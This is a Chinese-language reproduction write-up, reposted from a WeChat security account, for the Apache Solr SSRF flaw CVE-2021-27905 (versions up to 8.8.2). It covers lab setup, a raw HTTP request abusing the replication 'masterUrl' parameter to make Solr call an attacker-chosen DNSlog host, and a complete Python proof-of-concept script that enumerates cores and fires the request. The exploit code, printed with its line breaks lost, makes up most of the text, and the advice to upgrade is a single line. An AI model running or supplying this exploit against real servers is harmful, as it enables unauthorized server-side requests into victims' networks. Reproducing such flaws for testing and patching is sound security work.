0x00漏洞概述
Apache solr是一个开源的搜索服务,使用java编写,运行在serblet容器的一个独立的全文搜索服务器,是apache luncene项目的开源企业搜索平台。
0x01影响范围
Apache solr <=8.8.2
0x02漏洞复现
1、本次复现使用的是apache solr8.8.1版本,下载完成后解压进入bin目录,执行:
Solr start -p 8983 //启动环境(下载链接:http://archive.apache.org/dist/lucene/solr/8.8.1/)
2、点击Core Admin创建core发现报错
此时solr在server/solr目录下已经创建了名字new_core的文件夹,我们把server/solr/configsets/default文件夹下的conf文件复制到新建的new_core文件下:
此时即可创建成功;
访问http://127.0.0.1:8983/solr/admin/cores?indexInfo=false&wt=json,便可以看到core的名字:
3、SSRF数据包(其中core为实际节点的core值,dnslog为Dnslog的地址):
GET /solr/{core}/replication?command=fetchindex&masterUrl={dnslog} HTTP/1.1Host: IPAccept: application/json, text/plain, */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36Referer: http://IP/solr/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
4、POC复现:
POC:
# CVE-2021-27905# Apache solr ssrfimport requestsimport urllib3import jsonimport sys, getopturllib3.disable_warnings()def title():print("[-------------------------------------------------------------]")print("[-------------- Apache Solr SSRF漏洞 ---------------]")print("[-------- CVE-2021-27905 ----------]")print("[--------use:python3 CVE-2021-27905.py -u url -d dnslog--------]")print("[-------- Author:Henry4E36 ------------]")print("[-------------------------------------------------------------]")def commit():url = ""try:opt, agrs = getopt.getopt(sys.argv[1:], "hu:d:", ["help", "url=","dnslog="])for op, value in opt:if op == "-h" or op == "--help":print("""[-] Apache Solr SSRF漏洞 (CVE-2021-27905)[-] Options:-h or --help : 方法说明-u or --url : 站点URL地址-d or --dnslog : DnsLog""")sys.exit(0)elif op == "-u" or op == "--url=":url = valueelif op == "-d" or op == "--dnslog=":dnslog = valueelse:print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog")sys.exit()return url, dnslogexcept Exception as e:print("[-] 参数有误! eg:>>> python3 CVE-2021-27905.py -u http://127.0.0.1 -d dnslog")sys.exit(0)def target_core(url):target_url = url + "/solr/admin/cores?indexInfo=false&wt=json"headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"}try:res = requests.get(url=target_url,headers=headers,verify=False,timeout=5)core = list(json.loads(res.text)["status"])[0]return coreexcept Exception as e:print(f"[!] 目标系统: {url} 出现意外!n ",e)def ssrf(core,dnslog):target_url = url + f"/solr/{core}/replication/?command=fetchindex&masterUrl=http://{dnslog}"headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"}try:res = requests.get(url=target_url, headers=headers, verify=False, timeout=5)status = json.loads(res.text)["status"]if res.status_code == 200 and status == "OK":print(f"[!] 33[31m目标系统: {url} 可能存在SSRF漏洞,请检查DNSLog响应!33[0m")else:print(f"[0] 目标系统: {url} 不存在SSRF漏洞")except Exception as e:print(f"[!] 目标系统: {url} 出现意外!n ", e)if __name__ == "__main__":title()url ,dnslog = commit()core = target_core(url)ssrf(core,dnslog)
0x03修复建议:
升级到最新版本
下载地址:https://solr.apache.org/downloads.html
原文始发于微信公众号(黑云信息安全):Apache Solr SSRF (CVE-2021-27905)复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论